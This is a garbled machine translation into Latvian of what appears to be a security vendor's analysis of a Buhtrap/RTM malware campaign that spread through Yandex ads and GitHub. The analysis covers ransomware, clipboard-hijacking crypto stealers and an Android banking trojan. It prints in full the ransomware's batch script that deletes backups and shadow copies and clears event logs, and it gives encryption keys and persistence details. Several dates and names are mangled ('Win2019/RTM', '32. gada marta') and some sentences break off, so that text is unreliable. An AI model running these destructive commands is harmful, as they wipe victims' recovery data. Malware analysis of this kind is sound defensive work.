Lai vÄrstos pret grÄmatvežiem kiberuzbrukumÄ, varat izmantot darba dokumentus, kurus viÅi meklÄ tieÅ”saistÄ. Tas ir aptuveni tas, ko kibergrupa ir darÄ«jusi pÄdÄjo mÄneÅ”u laikÄ, izplatot zinÄmas aizmugures durvis.
Buhtrap avota kods iepriekÅ” ir nopludinÄts tieÅ”saistÄ, lai ikviens varÄtu to izmantot. Mums nav informÄcijas par RTM koda pieejamÄ«bu.
Å ajÄ ziÅojumÄ mÄs jums pastÄstÄ«sim, kÄ uzbrucÄji izplatÄ«ja ļaunprÄtÄ«gu programmatÅ«ru, izmantojot Yandex.Direct, un mitinÄja to vietnÄ GitHub. ZiÅa noslÄgsies ar ļaunprÄtÄ«gas programmatÅ«ras tehnisko analÄ«zi.
Buhtrap un RTM atgriežas biznesÄ
IzplatÄ«Å”anÄs mehÄnisms un upuri
DažÄdajÄm upuriem piegÄdÄtajÄm kravÄm ir kopÄ«gs izplatÄ«Å”anas mehÄnisms. Visi uzbrucÄju izveidotie ļaunprÄtÄ«gie faili tika ievietoti divÄs dažÄdÄs GitHub krÄtuvÄs.
Parasti repozitorijÄ bija viens lejupielÄdÄjams ļaunprÄtÄ«gs fails, kas bieži mainÄ«jÄs. TÄ kÄ GitHub ļauj skatÄ«t repozitorija izmaiÅu vÄsturi, mÄs varam redzÄt, kÄda ļaunprÄtÄ«ga programmatÅ«ra tika izplatÄ«ta noteiktÄ laika posmÄ. Lai pÄrliecinÄtu upuri lejupielÄdÄt ļaunprÄtÄ«go failu, tika izmantota vietne blanki-shabloni24[.]ru, kas parÄdÄ«ta attÄlÄ iepriekÅ”.
Vietnes dizains un visi ļaundabÄ«go failu nosaukumi ir veidoti pÄc vienota koncepcijas ā veidlapas, veidnes, lÄ«gumi, paraugi utt. Å emot vÄrÄ, ka Buhtrap un RTM programmatÅ«ra jau iepriekÅ” ir izmantota uzbrukumos grÄmatvežiem, mÄs pieÅÄmÄm, ka stratÄÄ£ija jaunajÄ kampaÅÄ ir tÄda pati. JautÄjums ir tikai par to, kÄ upuris nokļuva uzbrucÄju vietnÄ.
Infekcija
Vismaz vairÄkus potenciÄlos upurus, kas nokļuva Å”ajÄ vietnÄ, piesaistÄ«ja ļaunprÄtÄ«ga reklÄma. ZemÄk ir URL piemÄrs:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ŃŠŗŠ°ŃŠ°ŃŃ Š±Š»Š°Š½Šŗ ŃŃŠµŃŠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
KÄ redzat no saites, reklÄmkarogs tika ievietots likumÄ«gÄ grÄmatvedÄ«bas forumÄ bb.f2[.]kz. Ir svarÄ«gi atzÄ«mÄt, ka baneri parÄdÄ«jÄs dažÄdÄs vietnÄs, visiem bija vienÄds kampaÅas ID (blanki_rsya) un lielÄkÄ daļa bija saistÄ«ti ar grÄmatvedÄ«bas vai juridiskÄs palÄ«dzÄ«bas pakalpojumiem. URL parÄda, ka potenciÄlais upuris izmantoja pieprasÄ«jumu ālejupielÄdÄt rÄÄ·ina veidlapuā, kas apstiprina mÅ«su hipotÄzi par mÄrÄ·tiecÄ«giem uzbrukumiem. TÄlÄk ir norÄdÄ«tas vietnes, kurÄs parÄdÄ«jÄs baneri, un atbilstoÅ”ie meklÄÅ”anas vaicÄjumi.
- lejupielÄdÄt rÄÄ·ina veidlapu ā bb.f2[.]kz
- līguma paraugs - Ipopen[.]ru
- iesnieguma sūdzības paraugs - 77metrov[.]ru
- līguma veidlapa - blank-dogovor-kupli-prodazhi[.]ru
- tiesas lūguma paraugs - zen.yandex[.]ru
- sūdzības paraugs - yurday[.]ru
- lÄ«guma veidlapu paraugi ā Regforum[.]ru
- lÄ«guma veidlapa ā assistentus[.]ru
- dzÄ«vokļa lÄ«guma paraugs ā napravah[.]com
- juridisko līgumu paraugi - avito[.]ru
Vietne blanki-shabloni24[.]ru, iespÄjams, ir konfigurÄta, lai izturÄtu vienkÄrÅ”u vizuÄlu novÄrtÄjumu. Parasti reklÄma, kas norÄda uz profesionÄla izskata vietni ar saiti uz GitHub, neŔķiet kaut kas acÄ«mredzami slikts. TurklÄt uzbrucÄji krÄtuvÄ augÅ”upielÄdÄja ļaunprÄtÄ«gus failus tikai ierobežotu laiku, iespÄjams, kampaÅas laikÄ. LielÄko daļu laika GitHub repozitorijÄ bija tukÅ”s zip arhÄ«vs vai tukÅ”s EXE fails. TÄdÄjÄdi uzbrucÄji varÄja izplatÄ«t reklÄmu, izmantojot Yandex.Direct vietnÄs, kuras, visticamÄk, apmeklÄja grÄmatveži, kuri ieradÄs, atbildot uz konkrÄtiem meklÄÅ”anas vaicÄjumiem.
TÄlÄk apskatÄ«sim dažÄdÄs Å”ÄdÄ veidÄ sadalÄ«tÄs kravnesÄ«bas.
Kravas slodzes analīze
Izplatības hronoloģija
Ä»aunprÄtÄ«gÄ kampaÅa sÄkÄs 2018. gada oktobra beigÄs un ir aktÄ«va rakstÄ«Å”anas laikÄ. TÄ kÄ visa krÄtuve bija publiski pieejama vietnÄ GitHub, mÄs sastÄdÄ«jÄm precÄ«zu seÅ”u dažÄdu ļaunprÄtÄ«gas programmatÅ«ras Ä£imeÅu izplatÄ«Å”anas laika grafiku (skatiet attÄlu zemÄk). SalÄ«dzinÄjumam ar Git vÄsturi esam pievienojuÅ”i rindiÅu, kurÄ norÄdÄ«ts, kad reklÄmkaroga saite tika atklÄta, ko mÄra ar ESET telemetriju. KÄ redzat, tas labi korelÄ ar lietderÄ«gÄs slodzes pieejamÄ«bu vietnÄ GitHub. NeatbilstÄ«ba februÄra beigÄs ir izskaidrojama ar to, ka mums nebija daļa no izmaiÅu vÄstures, jo repozitorijs tika noÅemts no GitHub, pirms mÄs to varÄjÄm iegÅ«t pilnÄ«bÄ.
1. attÄls. Ä»aunprÄtÄ«go programmu izplatÄ«Å”anas hronoloÄ£ija.
Kodu parakstÄ«Å”anas sertifikÄti
KampaÅai tika izmantoti vairÄki sertifikÄti. Dažus no tiem parakstÄ«ja vairÄk nekÄ viena ļaunprÄtÄ«gas programmatÅ«ras saime, kas vÄl vairÄk norÄda, ka vienai kampaÅai piederÄja dažÄdi paraugi. Neskatoties uz privÄtÄs atslÄgas pieejamÄ«bu, operatori sistemÄtiski neparakstÄ«ja binÄros failus un neizmantoja atslÄgu visiem paraugiem. 2019. gada februÄra beigÄs uzbrucÄji sÄka veidot nederÄ«gus parakstus, izmantojot Google piederoÅ”u sertifikÄtu, kuram viÅiem nebija privÄtÄs atslÄgas.
Visi kampaÅÄ iesaistÄ«tie sertifikÄti un to parakstÄ«tÄs ļaunprÄtÄ«gas programmatÅ«ras saimes ir norÄdÄ«tas tabulÄ zemÄk.
MÄs esam arÄ« izmantojuÅ”i Å”os koda parakstÄ«Å”anas sertifikÄtus, lai izveidotu saites ar citÄm ļaunprÄtÄ«gas programmatÅ«ras Ä£imenÄm. LielÄkajai daļai sertifikÄtu mÄs neatradÄm paraugus, kas nebÅ«tu izplatÄ«ti caur GitHub krÄtuvi. TomÄr TOV āMARIYAā sertifikÄts tika izmantots, lai parakstÄ«tu ļaunprÄtÄ«gu programmatÅ«ru, kas pieder robottÄ«klam
Win32/Filecoder.Buhtrap
Pirmais komponents, kas pievÄrsa mÅ«su uzmanÄ«bu, bija jaunatklÄtais Win32/Filecoder.Buhtrap. Å is ir Delphi binÄrais fails, kas dažkÄrt tiek iepakots. Tas galvenokÄrt tika izplatÄ«ts 2019. gada februÄrÄ«āmartÄ. TÄ darbojas kÄ pienÄkas izspiedÄjvÄ«rusu programmai ā tÄ meklÄ vietÄjos diskos un tÄ«kla mapes un Å”ifrÄ atrastos failus. Tam nav nepiecieÅ”ams interneta savienojums, lai tas tiktu apdraudÄts, jo tas nesazinÄs ar serveri, lai nosÅ«tÄ«tu Å”ifrÄÅ”anas atslÄgas. TÄ vietÄ izpirkuma ziÅojuma beigÄs tiek pievienots āžetonsā un tiek ieteikts izmantot e-pastu vai Bitmessage, lai sazinÄtos ar operatoriem.
Lai Å”ifrÄtu pÄc iespÄjas vairÄk sensitÄ«vu resursu, Filecoder.Buhtrap vada pavedienu, kas paredzÄts atslÄgas programmatÅ«ras izslÄgÅ”anai, kurai var bÅ«t atvÄrti failu apdarinÄtÄji, kas satur vÄrtÄ«gu informÄciju, kas varÄtu traucÄt Å”ifrÄÅ”anu. MÄrÄ·a procesi galvenokÄrt ir datu bÄzes pÄrvaldÄ«bas sistÄmas (DBVS). TurklÄt Filecoder.Buhtrap dzÄÅ” žurnÄlfailus un dublÄjumkopijas, lai apgrÅ«tinÄtu datu atkopÅ”anu. Lai to izdarÄ«tu, palaidiet tÄlÄk norÄdÄ«to pakeÅ”u skriptu.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap izmanto likumÄ«gu tieÅ”saistes IP reÄ£istrÄtÄja pakalpojumu, kas paredzÄts informÄcijas apkopoÅ”anai par vietnes apmeklÄtÄjiem. Tas ir paredzÄts, lai izsekotu izspiedÄjvÄ«rusa upurus, par ko ir atbildÄ«ga komandrinda:
mshta.exe "javascript:document.write('');"
Å ifrÄÅ”anai paredzÄtie faili tiek atlasÄ«ti, ja tie neatbilst trim izslÄgÅ”anas sarakstiem. PirmkÄrt, netiek Å”ifrÄti faili ar Å”Ädiem paplaÅ”inÄjumiem: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys un .sikspÄrnis. OtrkÄrt, tiek izslÄgti visi faili, kuru pilnais ceļŔ satur direktoriju virknes no zemÄk esoÅ”Ä saraksta.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
TreÅ”kÄrt, daži failu nosaukumi arÄ« tiek izslÄgti no Å”ifrÄÅ”anas, tostarp izpirkuma ziÅojuma faila nosaukums. Saraksts ir parÄdÄ«ts zemÄk. AcÄ«mredzot visi Å”ie izÅÄmumi ir paredzÄti, lai maŔīna darbotos, taÄu ar minimÄlu tehnisko apkopi.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Failu Å”ifrÄÅ”anas shÄma
Kad ļaunprogrammatÅ«ra ir izpildÄ«ta, tÄ Ä£enerÄ 512 bitu RSA atslÄgu pÄri. PrivÄtais eksponents (d) un modulis (n) pÄc tam tiek Å”ifrÄti ar cieti kodÄtu 2048 bitu publisko atslÄgu (publiskais eksponents un modulis), zlib pakotne un base64 kodÄta. Par to atbildÄ«gais kods ir parÄdÄ«ts 2. attÄlÄ.
2. attÄls. 512 bitu RSA atslÄgu pÄru Ä£enerÄÅ”anas procesa Hex-Rays dekompilÄcijas rezultÄts.
TÄlÄk ir sniegts vienkÄrÅ”a teksta piemÄrs ar Ä£enerÄtu privÄto atslÄgu, kas ir marÄ·ieris, kas pievienots izpirkuma ziÅojumam.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
UzbrucÄju publiskÄ atslÄga ir norÄdÄ«ta zemÄk.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Faili tiek Å”ifrÄti, izmantojot AES-128-CBC ar 256 bitu atslÄgu. Katram Å”ifrÄtajam failam tiek Ä£enerÄta jauna atslÄga un jauns inicializÄcijas vektors. GalvenÄ informÄcija tiek pievienota Å”ifrÄtÄ faila beigÄs. ApskatÄ«sim Å”ifrÄtÄ faila formÄtu.
Å ifrÄtajiem failiem ir Å”Äda galvene:
Avota faila dati, pievienojot VEGA maÄ£isko vÄrtÄ«bu, tiek Å”ifrÄti lÄ«dz pirmajiem 0x5000 baitiem. Visa atÅ”ifrÄÅ”anas informÄcija ir pievienota failam ar Å”Ädu struktÅ«ru:
- Faila lieluma marÄ·ieris satur atzÄ«mi, kas norÄda, vai fails ir lielÄks par 0x5000 baitiem
ā AES atslÄgas lÄse = ZlibCompress (RSAEncrypt (AES atslÄga + IV, Ä£enerÄtÄ RSA atslÄgu pÄra publiskÄ atslÄga))
- RSA atslÄgas lÄse = ZlibCompress (RSAEncrypt (Ä£enerÄta RSA privÄtÄ atslÄga, cietÄ kodÄta RSA publiskÄ atslÄga))
Win32/ClipBanker
Win32/ClipBanker ir komponents, kas tika izplatÄ«ts ar pÄrtraukumiem no 2018. gada oktobra beigÄm lÄ«dz decembra sÄkumam. TÄs uzdevums ir uzraudzÄ«t starpliktuves saturu, tÄ meklÄ kriptovalÅ«tu maku adreses. PÄc mÄrÄ·a maka adreses noteikÅ”anas ClipBanker to aizstÄj ar adresi, kas, domÄjams, pieder operatoriem. MÅ«su pÄrbaudÄ«tie paraugi nebija ne iesaiÅoti, ne aptumÅ”oti. VienÄ«gais mehÄnisms, ko izmanto uzvedÄ«bas maskÄÅ”anai, ir virkÅu Å”ifrÄÅ”ana. Operatora maka adreses tiek Å”ifrÄtas, izmantojot RC4. MÄrÄ·a kriptovalÅ«tas ir Bitcoin, Bitcoin cash, Dogecoin, Ethereum un Ripple.
LaikÄ, kad ļaunprogrammatÅ«ra izplatÄ«jÄs uz uzbrucÄju Bitcoin makiem, neliela summa tika nosÅ«tÄ«ta VTS, kas liek Å”aubÄ«ties par kampaÅas panÄkumiem. TurklÄt nav pierÄdÄ«jumu, kas liecinÄtu, ka Å”ie darÄ«jumi vispÄr bÅ«tu saistÄ«ti ar ClipBanker.
Win32/RTM
32. gada marta sÄkumÄ Win2019/RTM komponents tika izplatÄ«ts vairÄkas dienas. RTM ir Delfos rakstÄ«ts Trojas baÅÄ·ieris, kas paredzÄts attÄlinÄtÄm banku sistÄmÄm. 2017. gadÄ ESET pÄtnieki publicÄja
Buhtrap iekrÄvÄjs
KÄdu laiku vietnÄ GitHub bija pieejams lejupielÄdÄtÄjs, kas nebija lÄ«dzÄ«gs iepriekÅ”Äjiem Buhtrap rÄ«kiem. ViÅÅ” pievÄrÅ”as https://94.100.18[.]67/RSS.php?<some_id>
lai iegÅ«tu nÄkamo posmu un ielÄdÄtu to tieÅ”i atmiÅÄ. MÄs varam atŔķirt divas otrÄ posma koda darbÄ«bas. PirmajÄ vietrÄdÄ« URL RSS.php tieÅ”i nodeva Buhtrap aizmugures durvis ā Ŕīs aizmugures durvis ir ļoti lÄ«dzÄ«gas tai, kas bija pieejama pÄc avota koda noplÅ«des.
Interesanti, ka mÄs redzam vairÄkas kampaÅas ar Buhtrap aizmugures durvÄ«m, un tÄs it kÄ vada dažÄdi operatori. Å ajÄ gadÄ«jumÄ galvenÄ atŔķirÄ«ba ir tÄ, ka aizmugures durvis tiek ielÄdÄtas tieÅ”i atmiÅÄ un neizmanto parasto shÄmu ar DLL izvietoÅ”anas procesu, par kuru mÄs runÄjÄm.
Otra, sarežģītÄka darbÄ«ba bija tÄda, ka RSS.php URL tika nodots citam ielÄdÄtÄjam. Tas ieviesa zinÄmu neskaidrÄ«bu, piemÄram, dinamiskÄs importÄÅ”anas tabulas pÄrbÅ«vi. Bootloader mÄrÄ·is ir sazinÄties ar C&C serveri
Android/Spy.Banker
Interesanti, ka GitHub repozitorijÄ tika atrasts arÄ« komponents Android ierÄ«cÄm. ViÅÅ” galvenajÄ filiÄlÄ bija tikai vienu dienu - 1. gada 2018. novembrÄ«. Papildus tam, ka ESET telemetrija ir publicÄta vietnÄ GitHub, tÄ neatrod nekÄdus pierÄdÄ«jumus par Ŕīs ļaunprÄtÄ«gÄs programmatÅ«ras izplatÄ«Å”anu.
Komponents tika mitinÄts kÄ Android lietojumprogrammu pakotne (APK). Tas ir ļoti apmulsis. Ä»aunprÄtÄ«ga darbÄ«ba ir paslÄpta Å”ifrÄtÄ JAR, kas atrodas APK. Tas ir Å”ifrÄts ar RC4, izmantojot Å”o atslÄgu:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
VirkÅu Å”ifrÄÅ”anai tiek izmantota tÄ pati atslÄga un algoritms. JAR atrodas APK_ROOT + image/files
. Pirmie 4 faila baiti satur Å”ifrÄtÄ JAR garumu, kas sÄkas uzreiz aiz garuma lauka.
PÄc faila atÅ”ifrÄÅ”anas mÄs atklÄjÄm, ka tas bija Anubis ā iepriekÅ”
- mikrofona ierakstīŔana
- ekrÄnuzÅÄmumu uzÅemÅ”ana
- iegÅ«t GPS koordinÄtas
- taustiÅu bloÄ·ÄtÄjs
- ierÄ«ces datu Å”ifrÄÅ”ana un izpirkuma maksas pieprasÄ«jums
- surogÄtpasta sÅ«tÄ«Å”ana
Interesanti, ka baÅÄ·ieris izmantoja Twitter kÄ rezerves saziÅas kanÄlu, lai iegÅ«tu citu C&C serveri. MÅ«su analizÄtajÄ paraugÄ tika izmantots @JonesTrader konts, taÄu analÄ«zes laikÄ tas jau bija bloÄ·Äts.
BaÅÄ·ieris satur Android ierÄ«ces mÄrÄ·a lietojumprogrammu sarakstu. Tas ir garÄks par Sophos pÄtÄ«jumÄ iegÅ«to sarakstu. SarakstÄ ir iekļautas daudzas banku lietojumprogrammas, tieÅ”saistes iepirkÅ”anÄs programmas, piemÄram, Amazon un eBay, un kriptovalÅ«tu pakalpojumi.
MSIL/ClipBanker.IH
PÄdÄjais komponents, kas tika izplatÄ«ts Ŕīs kampaÅas ietvaros, bija .NET Windows izpildÄmais fails, kas parÄdÄ«jÄs 2019. gada martÄ. LielÄkÄ daļa pÄtÄ«to versiju bija iesaiÅotas ar ConfuserEx v1.0.0. TÄpat kÄ ClipBanker, Å”is komponents izmanto starpliktuvi. ViÅa mÄrÄ·is ir plaÅ”s kriptovalÅ«tu klÄsts, kÄ arÄ« piedÄvÄjumi Steam. TurklÄt viÅÅ” izmanto pakalpojumu IP Logger, lai nozagtu Bitcoin privÄto WIF atslÄgu.
AizsardzÄ«bas mehÄnismi
Papildus priekÅ”rocÄ«bÄm, ko sniedz ConfuserEx, novÄrÅ”ot atkļūdoÅ”anu, izmeÅ”anu un iejaukÅ”anos, komponents ietver iespÄju noteikt pretvÄ«rusu produktus un virtuÄlÄs maŔīnas.
Lai pÄrbaudÄ«tu, vai tÄ darbojas virtuÄlajÄ maŔīnÄ, ļaunprÄtÄ«gÄ programmatÅ«ra izmanto iebÅ«vÄto Windows WMI komandrindu (WMIC), lai pieprasÄ«tu BIOS informÄciju, proti:
wmic bios
PÄc tam programma parsÄ komandas izvadi un meklÄ atslÄgvÄrdus: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Lai noteiktu pretvÄ«rusu produktus, ļaunprÄtÄ«ga programmatÅ«ra nosÅ«ta Windows pÄrvaldÄ«bas instrumentÄcijas (WMI) pieprasÄ«jumu uz Windows droŔības centru, izmantojot ManagementObjectSearcher
API, kÄ parÄdÄ«ts zemÄk. PÄc dekodÄÅ”anas no base64 zvans izskatÄs Å”Ädi:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
3. attÄls. PretvÄ«rusu produktu identificÄÅ”anas process.
TurklÄt ļaunprogrammatÅ«ra pÄrbauda, āāvai
Noturība
Ä»aunprÄtÄ«gÄs programmatÅ«ras versija, kuru mÄs pÄtÄ«jÄm, kopÄ sevi %APPDATA%googleupdater.exe
un iestata google direktorija atribÅ«tu āslÄptsā. Tad viÅa maina vÄrtÄ«bu SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
Windows reÄ£istrÄ un pievieno ceļu updater.exe
. TÄdÄ veidÄ Ä¼aunprogrammatÅ«ra tiks izpildÄ«ta katru reizi, kad lietotÄjs pieteiksies.
Ä»aunprÄtÄ«ga uzvedÄ«ba
TÄpat kÄ ClipBanker, ļaunprogrammatÅ«ra uzrauga starpliktuves saturu un meklÄ kriptovalÅ«tas maka adreses un, kad tiek atrasta, aizstÄj to ar vienu no operatora adresÄm. TÄlÄk ir norÄdÄ«ts mÄrÄ·a adreÅ”u saraksts, pamatojoties uz kodÄ atrodamo.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Katram adreses veidam ir atbilstoÅ”a regulÄrÄ izteiksme. STEAM_URL vÄrtÄ«ba tiek izmantota, lai uzbruktu Steam sistÄmai, kÄ redzams no regulÄrÄs izteiksmes, kas tiek izmantota, lai definÄtu buferÄ«:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
EksfiltrÄcijas kanÄls
Papildus adreÅ”u aizstÄÅ”anai buferÄ« ļaunprogrammatÅ«ra ir vÄrsta uz Bitcoin, Bitcoin Core un Electrum Bitcoin maku privÄtajÄm WIF atslÄgÄm. Programma izmanto vietni plogger.org kÄ izfiltrÄÅ”anas kanÄlu, lai iegÅ«tu WIF privÄto atslÄgu. Lai to izdarÄ«tu, operatori pievieno privÄtÄs atslÄgas datus User-Agent HTTP galvenÄ, kÄ parÄdÄ«ts tÄlÄk.
4. attÄls. IP reÄ£istrÄtÄja konsole ar izvades datiem.
Operatori neizmantoja vietni iplogger.org, lai izfiltrÄtu makus. ViÅi, iespÄjams, izmantoja citu metodi, jo laukÄ ir 255 rakstzÄ«mju ierobežojums User-Agent
parÄdÄ«ts IP Logger tÄ«mekļa saskarnÄ. MÅ«su pÄtÄ«tajos paraugos otrs izvades serveris tika saglabÄts vides mainÄ«gajÄ DiscordWebHook
. PÄrsteidzoÅ”i, Å”is vides mainÄ«gais kodÄ nav pieŔķirts nekur. Tas liecina, ka ļaunprogrammatÅ«ra joprojÄm ir izstrÄdes stadijÄ un mainÄ«gais ir pieŔķirts operatora testa iekÄrtai.
Ir vÄl viena pazÄ«me, ka programma ir izstrÄdes stadijÄ. BinÄrajÄ failÄ ir iekļauti divi iplogger.org vietrÄži URL, un abi tiek vaicÄti, kad dati tiek izfiltrÄti. PieprasÄ«jumÄ vienam no Å”iem URL laukÄ Referer vÄrtÄ«bas priekÅ”Ä ir āDEV /ā. MÄs atradÄm arÄ« versiju, kas nebija iepakota, izmantojot ConfuserEx. Å Ä« URL adresÄts ir DevFeedbackUrl. Pamatojoties uz vides mainÄ«gÄ nosaukumu, mÄs uzskatÄm, ka operatori plÄno izmantot likumÄ«go pakalpojumu Discord un tÄ tÄ«mekļa pÄrtverÅ”anas sistÄmu, lai nozagtu kriptovalÅ«tas makus.
SecinÄjums
Å Ä« kampaÅa ir piemÄrs likumÄ«gu reklÄmas pakalpojumu izmantoÅ”anai kiberuzbrukumos. ShÄma ir vÄrsta pret Krievijas organizÄcijÄm, taÄu mÄs nebÅ«tu pÄrsteigti, redzot Å”Ädu uzbrukumu, izmantojot pakalpojumus, kas nav krievi. Lai izvairÄ«tos no kompromisiem, lietotÄjiem ir jÄbÅ«t pÄrliecinÄtiem par lejupielÄdÄtÄs programmatÅ«ras avota reputÄciju.
Pilns kompromisa un MITER ATT&CK atribÅ«tu indikatoru saraksts ir pieejams vietnÄ
Avots: www.habr.com